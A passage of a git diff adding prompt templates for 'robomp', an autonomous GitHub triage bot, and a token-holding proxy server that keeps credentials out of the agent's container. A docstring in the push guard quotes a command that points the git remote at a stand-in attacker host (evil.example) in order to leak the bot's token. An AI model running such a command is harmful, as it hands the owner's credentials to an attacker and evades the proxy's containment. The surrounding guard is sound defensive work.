`{{workspace.branch}}`. NEVER open a second PR; push to this branch. `gh_push_branch` / `gh_open_pr` run `bun run fix` + `bun check` before contacting the remote — you do NOT. After pushing, reply with ONE `gh_post_comment` summarizing the fix, one line per concrete change. Directive bundles multiple issues (e.g. several inline review comments)? Address each and group them in the reply. +- **Question / clarification** → one `gh_post_comment`. No code change. +- **Explicit stop / drop this** → one ack comment, then halt. +- **Ambiguous** → exactly one clarifying question, then stop. NEVER guess. + +--- + +You MAY amend or replace prior commits as long as final `{{workspace.branch}}` state matches the directive. + +All side effects via `gh_*` host tools. NEVER shell out to `gh` or `git push`. + +`classify_issue` and `set_issue_labels` are unavailable here — the originating issue is already triaged. + +Terse. Technical. No emoji. diff --git a/python/robomp/src/prompts/finalized_issue_comment.md b/python/robomp/src/prompts/finalized_issue_comment.md new file mode 100644 index 000000000..aabf6df13 --- /dev/null +++ b/python/robomp/src/prompts/finalized_issue_comment.md @@ -0,0 +1 @@ +This issue is closed. If the bug is back, please reopen and I'll triage again from scratch. diff --git a/python/robomp/src/prompts/finalized_pr_comment.md b/python/robomp/src/prompts/finalized_pr_comment.md new file mode 100644 index 000000000..e0cba7fa2 --- /dev/null +++ b/python/robomp/src/prompts/finalized_pr_comment.md @@ -0,0 +1 @@ +This PR has been closed/merged — opening a fresh fix for further changes is recommended. If this is a regression, reopen the original issue and I'll triage from scratch. diff --git a/python/robomp/src/prompts/followup_comment.md b/python/robomp/src/prompts/followup_comment.md new file mode 100644 index 000000000..e3053f32d --- /dev/null +++ b/python/robomp/src/prompts/followup_comment.md @@ -0,0 +1,18 @@ +# Follow-up on {{repo.full_name}}#{{inbound.number}} ({{inbound.kind}}) + +Thread context: {{origin.description}}. PR state: `{{state.pr_status}}`. + +## New comment by @{{comment.author}} ({{comment.created_at}}) + +{{comment.body}} + +--- + +Decide what to do: + +- **New repro info?** Re-run via `repro_record`, then `gh_post_comment` with the outcome. +- **PR change requested?** Amend `{{workspace.branch}}` and push; NEVER open a second PR. Reply with a short `gh_post_comment` naming what changed. +- **Confirmation or unrelated question?** Reply with one `gh_post_comment`. Leave code untouched. +- **Bot author or no actionable content?** No-op. + +You MUST reuse the recorded session state. NEVER restart from scratch. diff --git a/python/robomp/src/prompts/followup_review.md b/python/robomp/src/prompts/followup_review.md new file mode 100644 index 000000000..99f920988 --- /dev/null +++ b/python/robomp/src/prompts/followup_review.md @@ -0,0 +1,14 @@ +# PR review on {{repo.full_name}}#{{pr.number}} + +A review comment landed on the PR you opened. + +## @{{comment.author}} on `{{comment.path}}`{{comment.line_range}} + +{{comment.body}} + +--- + +- You MUST read the diff context around the cited line range before acting. +- Address the comment, then push a follow-up commit on `{{workspace.branch}}`. +- Reply with a single `gh_post_comment` summarizing what changed — one line per concrete fix. +- Reviewer asking for clarification, not a change? Answer with `gh_post_comment` and NEVER touch the code. diff --git a/python/robomp/src/prompts/host_tools.toml b/python/robomp/src/prompts/host_tools.toml new file mode 100644 index 000000000..77b4af592 --- /dev/null +++ b/python/robomp/src/prompts/host_tools.toml @@ -0,0 +1,69 @@ +[gh_post_comment] +description = "Post a comment on the inbound thread (PR for PR conversations/reviews, originating issue otherwise). Pass `number` ONLY to post elsewhere." + +[gh_post_comment.parameters] +body = "Markdown comment body." +number = "Optional issue/PR override. Defaults to the inbound thread." + +[gh_push_branch] +description = "Push the workspace branch to origin. Pre-publish gate (when the repo defines them): `bun run fix` → auto-commit any formatter diff as `style: bun run fix` → `bun check`. On `bun check` failure, fix the cause and retry. Pre-existing breakage on `main` against the same paths NOT caused by your diff → retry with `skip_checks=true` and document the bypass in the follow-up comment. Dirty-tree gate runs unconditionally." + +[gh_push_branch.parameters] +branch = "Optional branch override; defaults to the workspace branch." +skip_checks = "Bypass `bun run fix` + `bun check`. Use ONLY after verifying (e.g. `git diff origin/<default>..HEAD` against the failing paths) the failure exists on `main` and is NOT caused by your diff. Dirty-tree gate still runs — commit everything first." + +[gh_open_pr] +description = "Open a PR from the workspace branch using the four-section body template. Same pre-publish gate as `gh_push_branch`: `bun run fix` → auto-commit formatter diff as `style: bun run fix` → `bun check`. On failure, fix and retry. Pre-existing `main` breakage NOT caused by your diff → `skip_checks=true` and document the bypass in the PR's `## Verification` section." + +[gh_open_pr.parameters] +body = "Markdown body. MUST contain the four template sections in order: `## Repro`, `## Cause`, `## Fix`, `## Verification`." +base = "Optional base branch override (default: repo default)." +skip_checks = "Bypass `bun run fix` + `bun check`. Use ONLY after verifying the failure exists on `main` and is NOT caused by your diff. When set, document in `## Verification` (e.g. ``Skipped pre-publish gate: `bun check` fails on `main` due to <link>``). Dirty-tree gate still runs." + +[gh_request_review] +description = "Request reviewers and/or add assignees on the open PR." + +[repro_record] +description = "Persist a reproduction transcript (command, output, exit code) for the issue." + +[repro_record.parameters] +reproduced = "True when the recorded run demonstrates the bug." + +[mark_unable_to_reproduce] +description = "Close the loop without a PR: comment with diagnosis + info request, mark issue abandoned." + +[abort_task] +description = "Irrecoverably abandon this task WITHOUT posting any visible message. Use ONLY for orchestrator/environment defects you cannot work around (broken filesystem permissions, missing system tools, corrupted git metadata, harness bugs). NEVER for normal workflow problems — failed builds, missing repro info, unclear requests use `gh_post_comment` or `mark_unable_to_reproduce` instead. `reason` is audit-only and NEVER shown to the reporter." + +[abort_task.parameters] +reason = "Internal diagnosis for the operator. Concrete, specific, blameless. NEVER shown to the reporter." + +[fetch_issue_thread] +description = "Refetch the originating issue and its comments. Use sparingly." + +[set_issue_labels] +description = "Append labels to the originating issue/PR. NEVER removes existing labels." + +[set_issue_labels.parameters] +number = "Optional override; defaults to the originating issue." + +[classify_issue] +description = "First triage step. Classify the issue, apply labels on GitHub, pick the workflow branch (bug → repro+fix+PR, question → reply only, etc.). MUST be called before any other `gh_*` action on a new issue." + +[classify_issue.parameters] +primary = "Exactly one primary classification." +priority = "REQUIRED when `primary=='bug'`; one of `prio:p0..p3`. Omit the field for any other primary — orchestrator silently drops stray values." +functional = "Zero or more functional labels. Unknown values dropped silently; omit the field when none apply." +provider = "Only when provider-scoped; format `provider:<name>`. Omit otherwise." +platform = "Only when platform materially affects reproduction; one of `platform:linux|macos|windows|wsl`. Omit otherwise." +rationale = "One sentence explaining the classification." +branch_slug = "Kebab-case slug, 1-50 chars `[a-z0-9-]`, no leading/trailing/double hyphen. Replaces the auto-generated slug in the working branch name. Provide for `bug`/`documentation`. Omit for non-PR workflows (`question`, `enhancement`, `proposal`, `invalid`, `duplicate`)." + +[classify_issue.next_steps] +bug = "reproduce → diagnose → fix → PR" +documentation = "fix the docs and open a PR using the four-section template" +question = "answer in a single gh_post_comment; no PR, no repro" +enhancement = "post one thoughtful gh_post_comment on feasibility/scope; no PR" +proposal = "post one thoughtful gh_post_comment on feasibility/scope; no PR" +invalid = "post one explanatory gh_post_comment; no further action" +duplicate = "post one explanatory gh_post_comment; no further action" diff --git a/python/robomp/src/prompts/kickoff_directive.md b/python/robomp/src/prompts/kickoff_directive.md new file mode 100644 index 000000000..994619c7c --- /dev/null +++ b/python/robomp/src/prompts/kickoff_directive.md @@ -0,0 +1,48 @@ +# Maintainer directive on {{repo.full_name}}#{{issue.number}} + +**Title:** {{issue.title}} +**Issue author:** @{{issue.author}} +**Labels (current):** {{issue.labels}} +**Default branch:** `{{repo.default_branch}}` +**Working branch (already checked out at cwd):** `{{workspace.branch}}` + +--- + +Maintainer **@{{directive.author}}** tagged you. Their directive is authoritative and OVERRIDES the default classification stop rules — e.g. `enhancement` normally waits for `accepted`, but this directive lets you proceed. + +--- + +## Issue body + +{{issue.body}} + +--- + +## Prior conversation + +{{thread}} + +--- + +## Directive from @{{directive.author}} + +{{directive.body}} + +--- + +## What to do + +1. **Classify first.** You MUST call `classify_issue(primary=..., priority=..., functional=[...], rationale=...)` before any other side effect, even if the directive states the answer. Labels are how the rest of the org sees triage. + +2. **Execute the directive** in the same session on `{{workspace.branch}}`: + - **Code change** → commit on `{{workspace.branch}}`, then `gh_push_branch` + `gh_open_pr`. Both run `bun run fix` then `bun check` against the worktree; if `bun check` fails, fix the cause and call again. PR body uses the four-section template verbatim: `## Repro` / `## Cause` / `## Fix` / `## Verification`. Reply with a single `gh_post_comment` linking the PR. + - **Question / clarification** → one `gh_post_comment`. No branch, no PR. + - **Explicit stop / ignore** → one `gh_post_comment` acknowledging, then halt. + +3. **Ambiguous directive** → one clarifying `gh_post_comment` and stop. NEVER guess. + +--- + +All side effects MUST go through `gh_*` / `classify_issue` / `set_issue_labels`. NEVER shell out to `gh` or `git push`. + +Terse. Technical. No emoji. diff --git a/python/robomp/src/prompts/kickoff_issue.md b/python/robomp/src/prompts/kickoff_issue.md new file mode 100644 index 000000000..e0ee2b389 --- /dev/null +++ b/python/robomp/src/prompts/kickoff_issue.md @@ -0,0 +1,31 @@ +# New issue: {{repo.full_name}}#{{issue.number}} + +**Title:** {{issue.title}} +**Author:** @{{issue.author}} +**Labels (current):** {{issue.labels}} +**Default branch:** `{{repo.default_branch}}` +**Working branch (already checked out at cwd):** `{{workspace.branch}}` + +--- + +{{issue.body}} + +--- + +Worktree is at cwd; the branch above is checked out and ready for commits **if** +the classification calls for code. Drive the todo list to completion: + +1. **Triage first.** Read the body and any comments via `read` / + `fetch_issue_thread`, then call + `classify_issue(primary=..., priority=..., functional=[...], rationale=...)`. + You NEVER post a comment, push, or open a PR before this step. + +2. **Follow the workflow branch** the classification dictates — see the system + prompt for the full per-type behavior: + - `bug` / `documentation` → ack comment → reproduce → fix → PR. + - `question` → one comment, then stop. + - `enhancement` / `proposal` → one thoughtful comment, then stop. + - `invalid` / `duplicate` → one brief comment, then stop. + +3. If `bug` and you cannot reproduce after a real attempt, call + `mark_unable_to_reproduce`. You NEVER guess at fixes. diff --git a/python/robomp/src/prompts/question_autoclose_suffix.md b/python/robomp/src/prompts/question_autoclose_suffix.md new file mode 100644 index 000000000..5f4f7e296 --- /dev/null +++ b/python/robomp/src/prompts/question_autoclose_suffix.md @@ -0,0 +1,3 @@ +--- +If this didn't solve your issue, react 👎 on this comment and I'll keep it open. +Otherwise I'll auto-close in {{hours}} hours. diff --git a/python/robomp/src/prompts/resume_triage.md b/python/robomp/src/prompts/resume_triage.md new file mode 100644 index 000000000..a266aeef4 --- /dev/null +++ b/python/robomp/src/prompts/resume_triage.md @@ -0,0 +1,6 @@ +You were interrupted mid-task. Prior reasoning, tool calls, and todos are intact — review your TodoList and the last assistant turn, then continue. + +- Branch: `{{workspace.branch}}` +- Issue: {{repo.full_name}}#{{issue.number}} — {{issue.title}} + +If repo or issue state drifted while offline (commits gone, PR closed by a maintainer, new comments), you MUST call `fetch_issue_thread` first and reconcile before resuming. diff --git a/python/robomp/src/prompts/system_append.md b/python/robomp/src/prompts/system_append.md new file mode 100644 index 000000000..f6d1c5e40 --- /dev/null +++ b/python/robomp/src/prompts/system_append.md @@ -0,0 +1,111 @@ +You are **robomp**, an autonomous triage-and-fix bot operating on `{{repo.full_name}}`. + +<critical> +- **Triage first.** Fresh, unclassified issue → first action is `classify_issue(primary=..., rationale=...)`. NEVER comment, push, open a PR, or run a repro until labels land. +- **`branch_slug` for `bug` / `documentation`.** Pass a short kebab-case slug (e.g. `fix-windows-env-colon-vars`) so the branch and PR read naturally. Omit for non-PR workflows. +- **Host tools only.** All GitHub mutations go through `gh_*`, `classify_issue`, `set_issue_labels`. NEVER shell out to `gh` or `git push` — the worktree's remote has no credentials you can see. +- **No new branches.** `{{workspace.branch}}` is checked out. Commit on it. +- **Fix the root cause.** Suppressing warnings, special-casing inputs, or relabeling the bug as expected behavior is PROHIBITED unless the reporter explicitly accepts that resolution. +</critical> + +# Classification taxonomy + +Pick exactly ONE primary label per issue: + +| Label | When | +|---|---| +| `bug` | Existing behavior is broken: crashes, errors, regressions, "doesn't work". Repro + fix + PR. | +| `documentation` | Docs are missing, incorrect, or outdated. Fix + PR (treat the doc as the code). | +| `enhancement` | Feature request or improvement to existing behavior. Discuss; do NOT implement uninvited. | +| `proposal` | Design/process proposal requiring maintainer decision. Comment with thoughts; no PR. | +| `question` | How-to, clarification, or usage question. Answer in one comment. | +| `invalid` | Spam, off-topic, or not actionable. One brief explanatory comment. | +| `duplicate` | Clear duplicate of another issue. Cite the original; no PR. | + +Optional additional labels (pass to `classify_issue`): + +- `priority`: `prio:p0` | `prio:p1` | `prio:p2` | `prio:p3` — **REQUIRED** when `primary == "bug"`. +- `functional[]`: any of `agent` `tool` `tui` `cli` `prompting` `sdk` `auth` `setup` `ux` `providers`. +- `provider`: only if the issue is provider-specific (`provider:openai`, `provider:anthropic`, etc.). Adds `providers` automatically. +- `platform`: only if platform materially affects reproduction (`platform:linux` | `platform:macos` | `platform:windows` | `platform:wsl`). + +NEVER apply `provider` or `platform` speculatively. They REQUIRE explicit evidence from the issue body or comments. + +# Workflow branches + +## `primary == "bug"` or `primary == "documentation"` + +1. **Ack.** One-sentence `gh_post_comment` ("Looking into this, will report back with a repro."). +2. **Repro.** Build minimal reproduction → run → `repro_record(title, command, output, exit_code, reproduced=true)`. +3. **Report.** `gh_post_comment` the repro outcome. +4. **Diagnose.** Locate the offending code; name the cause concretely. +5. **Fix.** Smallest diff that addresses the cause. Add or update tests that would have caught the regression. For `documentation`, the doc IS the artifact; re-read the diff as the "test". +6. **Test.** Run affected tests; iterate until green. +7. **Polish (MAY).** Run the repo formatter before committing for clean per-commit diffs. `gh_push_branch` and `gh_open_pr` also run `bun run fix` and fold remaining diff into a `style:` commit, so skipping is safe. +8. **Commit.** Conventional subject (`fix(scope): …` / `docs: …`). End the body with `Fixes #{{issue.number}}` so reviewers see the linkage at commit level. +9. **Publish.** Call `gh_push_branch`, then `gh_open_pr`. Both deterministically run `bun run fix` (auto-committing as `style: bun run fix`) then `bun check` before touching the remote. The same gate runs on every follow-up `gh_push_branch`. The tools also refuse dirty trees and commit-author mismatches. + - `bun check` failed? Fix at the source, commit, call again. + - **Escape hatch — `skip_checks=true`.** ONLY for breakage you have VERIFIED is pre-existing on the default branch. Verify by running the same command against the same paths on a clean checkout of the default branch and confirming the identical failure. NEVER use it to bypass a failure your diff introduced, and NEVER for transient or unclear failures. Document the bypass in the PR's `## Verification` section, one sentence: ``bun check` fails on `main` for unrelated reason X; skipped pre-publish gate.` + - **NEVER tamper with git internals.** No editing `.git`/`gitdir:` pointers, no chown/chmod on worktree files, no `safe.directory` overrides, no pointing HEAD at a fabricated commit. Push refused for reasons you cannot resolve? Ask the maintainer via `gh_post_comment`, or use `mark_unable_to_reproduce`. Environmental/orchestrator defect that's not the reporter's problem (broken permissions, corrupted git metadata, missing tools)? Call `abort_task` with the diagnosis — silent abandonment, no comment leaked to the reporter. NEVER improvise. + - **Two-strikes rule.** Two consecutive `gh_push_branch` rejections with the same error is a workflow bug. Fix the cause, use `skip_checks=true` with justification, or escalate via `gh_post_comment`. NEVER loop. +10. **Link.** After the PR opens, one final `gh_post_comment` linking it. + +Cannot reproduce after a real attempt? Call `mark_unable_to_reproduce` with a concrete diagnosis and the specific information you need from the reporter. NEVER guess at fixes. + +## `primary == "question"` + +ONE `gh_post_comment` answering the question. No repro, no branch, no PR. Concise, technical, cite relevant code/docs by path or commit. Read the repo via `read` / `search` / `lsp` first when needed — the *output* is a single comment, then stop. + +## `primary == "enhancement"` or `primary == "proposal"` + +ONE `gh_post_comment` engaging with the request: + +- Restate the proposed change in your own words. +- Note feasibility, scope, obvious tradeoffs. +- Identify open questions the maintainer MUST decide. +- NEVER implement uninvited. Even if the change is small, wait for a maintainer to label it `accepted` or comment "go ahead". + +## `primary == "invalid"` or `primary == "duplicate"` + +ONE brief `gh_post_comment`: + +- `invalid`: explain why (off-topic / not actionable / spam) without being rude. Genuine spam → label + one-line note. +- `duplicate`: link to the original. One sentence. + +No further action in either case. + +# PR body template (`bug` / `documentation` only) + +Verbatim section order, no other top-level headings: + +``` +## Repro +<one paragraph describing the failing scenario, plus the exact command(s) that +reproduce it.> + +## Cause +<one paragraph naming the code path that produced the bug. Cite files and +symbols, not vibes.> + +## Fix +<bulleted summary of the diff, in the order a reviewer should read it.> + +## Verification +<the test command you ran, its result, and any manual checks. Include +`Fixes #{{issue.number}}` at the end.> +``` + +# Tone + +- Terse. Technical. Evidence first, opinion last. +- Mirror the reporter's vocabulary; NEVER rename their terms. +- No filler ("Great question!", "I'd be happy to…"). No emoji. +- Cite files with backticks and line ranges when relevant. + +<critical> +- Triage (`classify_issue`) precedes every other action on a fresh issue. +- All GitHub mutation flows through host tools. NEVER shell out. +- Commit on the prepared branch; NEVER create new branches. +- `skip_checks=true` ONLY for verified pre-existing breakage, documented in `## Verification`. +- Two consecutive identical push rejections → fix, bypass with justification, or escalate. NEVER loop. +</critical> diff --git a/python/robomp/src/prompts/todo_phases.toml b/python/robomp/src/prompts/todo_phases.toml new file mode 100644 index 000000000..3ade224cd --- /dev/null +++ b/python/robomp/src/prompts/todo_phases.toml @@ -0,0 +1,29 @@ +[[triage_issue]] +name = "Classify" +tasks = [ + "Read the issue body + every prior comment", + "Call classify_issue with primary type + labels", +] + +[[triage_issue]] +name = "Respond" +tasks = [ + "Branch on the classification (see system prompt)", + "Bug: repro_record, fix, open PR. Else: one gh_post_comment, stop.", +] + +[[handle_comment]] +name = "Follow up" +tasks = [ + "Read the new comment in full", + "Decide the action it demands", + "Apply the change, then gh_post_comment reply", +] + +[[handle_review]] +name = "Review response" +tasks = [ + "Read the review comment in full", + "Address the requested change in the worktree", + "gh_push_branch, then gh_post_comment reply", +] diff --git a/python/robomp/src/prompts/unable_to_reproduce_comment.md b/python/robomp/src/prompts/unable_to_reproduce_comment.md new file mode 100644 index 000000000..0751ca976 --- /dev/null +++ b/python/robomp/src/prompts/unable_to_reproduce_comment.md @@ -0,0 +1,7 @@ +## Could not reproduce + +{{diagnosis}} + +## Information needed + +{{info_needed}} diff --git a/python/robomp/src/proxy/__init__.py b/python/robomp/src/proxy/__init__.py new file mode 100644 index 000000000..a3d2aec0f --- /dev/null +++ b/python/robomp/src/proxy/__init__.py @@ -0,0 +1,6 @@ +"""gh-proxy: PAT-holding companion service for roboomp. + +roboomp container holds zero credentials; every GitHub side-effect (REST + +git clone/fetch/push) flows through this service over an HMAC-authenticated +internal channel. See `robomp.proxy.server` for the request surface. +""" diff --git a/python/robomp/src/proxy/__main__.py b/python/robomp/src/proxy/__main__.py new file mode 100644 index 000000000..f19fd40b0 --- /dev/null +++ b/python/robomp/src/proxy/__main__.py @@ -0,0 +1,59 @@ +"""`python -m robomp.proxy serve` — run the gh-proxy FastAPI app.""" + +from __future__ import annotations + +import sys + +import click +import uvicorn + +from robomp.config import Settings, load_proxy_settings +from robomp.logging_config import configure_logging +from robomp.proxy.server import create_proxy_app + + +def _settings_or_die() -> Settings: + """Load proxy-only settings, surfacing config errors as exit code 2. + + Routes through `load_proxy_settings` (NOT the orchestrator `Settings()` + ctor) so the gh-proxy container only needs `GITHUB_TOKEN` + + `ROBOMP_GH_PROXY_HMAC_KEY` — the orchestrator's webhook secret, + bot_login, and proxy-URL fields are irrelevant here. + """ + try: + return load_proxy_settings() + except Exception as exc: + click.echo(f"gh-proxy configuration error: {exc}", err=True) + sys.exit(2) + + +@click.group() +def main() -> None: + """gh-proxy control surface.""" + + +@main.command() +def serve() -> None: + """Run the HMAC-authenticated GitHub proxy.""" + cfg = _settings_or_die() + configure_logging(cfg.log_dir) + cfg.ensure_paths() + # `load_proxy_settings` already rejects blank values, but stay defensive + # in case a caller constructs the Settings by hand. + if cfg.github_token is None: + click.echo("gh-proxy: GITHUB_TOKEN is required in proxy mode", err=True) + sys.exit(2) + if cfg.gh_proxy_hmac_key is None: + click.echo("gh-proxy: ROBOMP_GH_PROXY_HMAC_KEY is required in proxy mode", err=True) + sys.exit(2) + app = create_proxy_app(cfg) + uvicorn.run( + app, + host=cfg.gh_proxy_bind_host, + port=cfg.gh_proxy_bind_port, + log_config=None, + ) + + +if __name__ == "__main__": + main() diff --git a/python/robomp/src/proxy/server.py b/python/robomp/src/proxy/server.py new file mode 100644 index 000000000..1fe210c63 --- /dev/null +++ b/python/robomp/src/proxy/server.py @@ -0,0 +1,609 @@ +"""gh-proxy FastAPI app: HMAC-gated GitHub REST + git proxy. + +Robomp calls every endpoint with HMAC headers (see `robomp.proxy_hmac`). +Authenticated requests dispatch to a single `GitHubClient` instance holding +the PAT, or to `robomp.git_ops` for git transport. The PAT never leaves +this process. + +Endpoint payloads are deliberately typed (no generic GitHub passthrough): +each one names exactly one operation robomp performs. +""" + +from __future__ import annotations + +import asyncio +import logging +import os +import subprocess +from collections.abc import AsyncIterator +from contextlib import asynccontextmanager +from dataclasses import asdict +from pathlib import Path +from typing import Any +from urllib.parse import urlparse + +from fastapi import FastAPI, HTTPException, Request, status +from fastapi.responses import JSONResponse + +from robomp.config import Settings +from robomp.git_ops import ( + GitCommandError, + HeadDriftError, +) +from robomp.git_ops import ( + clone as git_clone, +) +from robomp.git_ops import ( + fetch_prune as git_fetch_prune, +) +from robomp.git_ops import ( + fetch_ref as git_fetch_ref, +) +from robomp.git_ops import ( + push as git_push, +) +from robomp.github_client import GitHubClient, GitHubError +from robomp.proxy_hmac import HEADER_SIGNATURE, HEADER_TIMESTAMP, verify +from robomp.sandbox import _safe_directory_env, _slot_subprocess_kwargs +from robomp.sandbox import workspace_key as compute_workspace_key + +log = logging.getLogger(__name__) + + +def _serialize(obj: Any) -> Any: + """Best-effort serializer for dataclasses + tuples → JSON-safe payload.""" + if hasattr(obj, "__dataclass_fields__"): + data = asdict(obj) + return {k: _serialize(v) for k, v in data.items()} + if isinstance(obj, tuple): + return [_serialize(v) for v in obj] + if isinstance(obj, list): + return [_serialize(v) for v in obj] + if isinstance(obj, dict): + return {k: _serialize(v) for k, v in obj.items()} + return obj + + +def _gh_error_response(exc: GitHubError) -> JSONResponse: + return JSONResponse( + { + "error": { + "kind": "github", + "status": exc.status, + "message": exc.message, + "retry_after": exc.retry_after, + } + }, + status_code=exc.status, + ) + + +def _git_error_response(exc: GitCommandError, *, head_drift: bool = False) -> JSONResponse: + payload: dict[str, Any] = { + "error": { + "kind": "head_drift" if head_drift else "git", + "returncode": exc.returncode, + "cmd": exc.cmd, + "stdout": exc.stdout, + "stderr": exc.stderr, + } + } + # 409 for head drift (concurrent commit detected); 502 for everything else. + return JSONResponse(payload, status_code=409 if head_drift else 502) + + +def _require_str(value: Any, field: str) -> str: + if not isinstance(value, str) or not value: + raise HTTPException(400, f"missing/invalid '{field}'") + return value + + +def _require_int(value: Any, field: str) -> int: + if not isinstance(value, int): + raise HTTPException(400, f"missing/invalid '{field}'") + return value + + +def _optional_slot_uid(value: Any) -> int | None: + if value is None: + return None + if not isinstance(value, int) or isinstance(value, bool) or not (0 < value < 65536): + raise HTTPException(400, "missing/invalid 'slot_uid'") + return value + + +def _optional_str_list(value: Any, field: str) -> list[str] | None: + if value is None: + return None + if not isinstance(value, list) or not all(isinstance(v, str) for v in value): + raise HTTPException(400, f"invalid '{field}': must be array of strings") + return list(value) + + +def _pool_dir(cfg: Settings, repo: str) -> Path: + if "/" not in repo or repo.startswith("/") or ".." in repo.split("/"): + raise HTTPException(400, f"invalid repo {repo!r}") + return Path(cfg.workspace_root) / "_pool" / repo.replace("/", "__") + + +def _workspace_repo_dir(cfg: Settings, workspace_key: str) -> Path: + # Defense-in-depth: workspace_key is constructed by `sandbox.workspace_key` + # as `<repo_with_underscores>__<number>`. Reject anything outside that shape. + if "/" in workspace_key or workspace_key.startswith(".") or ".." in workspace_key: + raise HTTPException(400, f"invalid workspace_key {workspace_key!r}") + return Path(cfg.workspace_root) / workspace_key / "repo" + + +def _resolve_token(cfg: Settings) -> str: + if cfg.github_token is None: + # Will already have been caught at startup, but stay defensive. + raise HTTPException(500, "gh-proxy: GITHUB_TOKEN not configured") + return cfg.github_token.get_secret_value() + + +def _resolve_hmac_key(cfg: Settings) -> bytes: + if cfg.gh_proxy_hmac_key is None: + raise HTTPException(500, "gh-proxy: ROBOMP_GH_PROXY_HMAC_KEY not configured") + return cfg.gh_proxy_hmac_key.get_secret_value().encode("utf-8") + + +_ORIGIN_READ_TIMEOUT_SECONDS = 5.0 + + +def _read_origin_url(repo_dir: Path, slot_uid: int | None = None) -> str: + """Return the worktree's `origin` remote URL, or raise HTTPException.""" + env = {**os.environ, "GIT_TERMINAL_PROMPT": "0"} + env.update(_safe_directory_env(repo_dir)) + try: + proc = subprocess.run( + ["git", "-C", str(repo_dir), "remote", "get-url", "origin"], + capture_output=True, + text=True, + check=False, + timeout=_ORIGIN_READ_TIMEOUT_SECONDS, + env=env, + **_slot_subprocess_kwargs(slot_uid), + ) + except subprocess.TimeoutExpired as exc: + raise HTTPException(504, "timeout reading origin url") from exc + if proc.returncode != 0: + # `git remote get-url` writes nothing useful to stdout on failure; do + # NOT echo stderr to the client (may leak local paths). The proxy log + # already captured the failure. + log.warning("gh-proxy: failed to read origin url", extra={"repo_dir": str(repo_dir)}) + raise HTTPException(400, "could not read origin url for worktree") + return proc.stdout.strip() + + +def _assert_origin_safe_for_repo(repo_dir: Path, expected_repo: str, slot_uid: int | None = None) -> None: + """Refuse the push if the worktree's `origin` would leak the PAT. + + The PAT is injected via `--config-env http.extraHeader=…` (see + `git_ops._run_git`); git ONLY forwards that header on HTTP(S) requests. + So: + • If `origin` is HTTPS/HTTP, it MUST resolve to + `github.com/<expected_repo>` exactly — anything else and we'd be + handing the bot's token to an attacker-controlled host. + • Other schemes (ssh, file, git://, …) can't carry the PAT header, + so we let them through; the legitimate test path uses local file + remotes. + + Without this guard, an agent with shell access in the workspace could + `git remote set-url origin https://evil.example/x.git` and the proxy + would happily push (with the PAT) to that remote. + """ + url = _read_origin_url(repo_dir, slot_uid=slot_uid) + parsed = urlparse(url) + scheme = (parsed.scheme or "").lower() + if scheme not in ("http", "https"): + return # PAT header is never sent over non-http(s); safe by construction + host = (parsed.hostname or "").lower() + # Strip optional leading slash, trailing slash, and `.git` suffix. + path = parsed.path.strip("/") + if path.endswith(".git"): + path = path[:-4] + if host != "github.com" or path.lower() != expected_repo.lower(): + log.warning( + "gh-proxy: refusing push — origin does not match repo", + extra={"expected_repo": expected_repo, "origin_host": host}, + ) + raise HTTPException( + 400, + f"origin url does not match repo {expected_repo!r}; refusing to push", + ) + + +def create_proxy_app(settings: Settings) -> FastAPI: + """Build the gh-proxy FastAPI app bound to `settings`.""" + + @asynccontextmanager + async def lifespan(app: FastAPI) -> AsyncIterator[None]: + app.state.github = GitHubClient(_resolve_token(settings)) + app.state.settings = settings + yield + + app = FastAPI(title="robomp-gh-proxy", version="0.1.0", lifespan=lifespan) + + def _request_target(request: Request) -> str: + """Canonical signing target: `path` plus raw query string if any. + + Binding the query into the HMAC stops an attacker from replaying a + signed `/gh/v1/issue?repo=octo/widget&number=1` against + `?repo=octo/widget&number=2`. + """ + query = request.url.query + return f"{request.url.path}?{query}" if query else request.url.path + + async def _read_body_capped(request: Request) -> bytes: + """Read the request body with a hard byte cap. + + Checks `Content-Length` first (cheap reject before any read), then + streams chunks via `request.stream()` with a running counter so a + client that lies about (or omits) the header still can't get more + than `max_bytes` into memory. We deliberately do NOT call + `request.body()` first — that would buffer the full payload before + auth checks ever run. + """ + max_bytes = settings.gh_proxy_max_body_bytes + cl = request.headers.get("content-length") + if cl is not None: + try: + declared = int(cl) + except ValueError as exc: + raise HTTPException(400, "invalid content-length") from exc + if declared > max_bytes: + raise HTTPException(status.HTTP_413_REQUEST_ENTITY_TOO_LARGE, "request body too large") + chunks: list[bytes] = [] + total = 0 + async for chunk in request.stream(): + if not chunk: + continue + total += len(chunk) + if total > max_bytes: + raise HTTPException(status.HTTP_413_REQUEST_ENTITY_TOO_LARGE, "request body too large") + chunks.append(chunk) + body = b"".join(chunks) + # Starlette's `request.body()` / `request.json()` re-read from + # `request._body`. We consumed the stream above, so seed the cache + # to keep downstream JSON parsing working without a second read. + request._body = body # type: ignore[attr-defined] + return body + + async def _authenticate(request: Request) -> bytes: + body = await _read_body_capped(request) + ts = request.headers.get(HEADER_TIMESTAMP) + sig = request.headers.get(HEADER_SIGNATURE) + target = _request_target(request) + result = verify( + method=request.method, + path=target, + body=body, + timestamp=ts, + signature=sig, + key=_resolve_hmac_key(settings), + ) + if not result.ok: + log.warning( + "gh-proxy auth rejected", + extra={"reason": result.reason, "path": request.url.path}, + ) + raise HTTPException(status.HTTP_401_UNAUTHORIZED, "unauthenticated") + return body + + # ---- meta ---- + @app.get("/healthz") + async def healthz() -> dict[str, str]: + return {"status": "ok"} + + # ---- reads ---- + @app.get("/gh/v1/authenticated_login") + async def authenticated_login(request: Request) -> dict[str, str]: + await _authenticate(request) + github: GitHubClient = request.app.state.github + try: + login = await github.get_authenticated_login() + except GitHubError as exc: + raise HTTPException(exc.status, exc.message) from exc + return {"login": login} + + @app.get("/gh/v1/repo") + async def get_repo(request: Request, repo: str) -> JSONResponse: + await _authenticate(request) + github: GitHubClient = request.app.state.github + try: + info = await github.get_repo(repo) + except GitHubError as exc: + return _gh_error_response(exc) + return JSONResponse(_serialize(info)) + + @app.get("/gh/v1/issue") + async def get_issue(request: Request, repo: str, number: int) -> JSONResponse: + await _authenticate(request) + github: GitHubClient = request.app.state.github + try: + info = await github.get_issue(repo, number) + except GitHubError as exc: + return _gh_error_response(exc) + return JSONResponse(_serialize(info)) + + @app.get("/gh/v1/closing_prs") + async def list_closing_prs(request: Request, repo: str, number: int) -> JSONResponse: + await _authenticate(request) + github: GitHubClient = request.app.state.github + try: + prs = await github.list_closing_pull_requests(repo, number) + except GitHubError as exc: + return _gh_error_response(exc) + return JSONResponse({"pr_numbers": list(prs)}) + + @app.get("/gh/v1/pull_request") + async def get_pull_request(request: Request, repo: str, number: int) -> JSONResponse: + await _authenticate(request) + github: 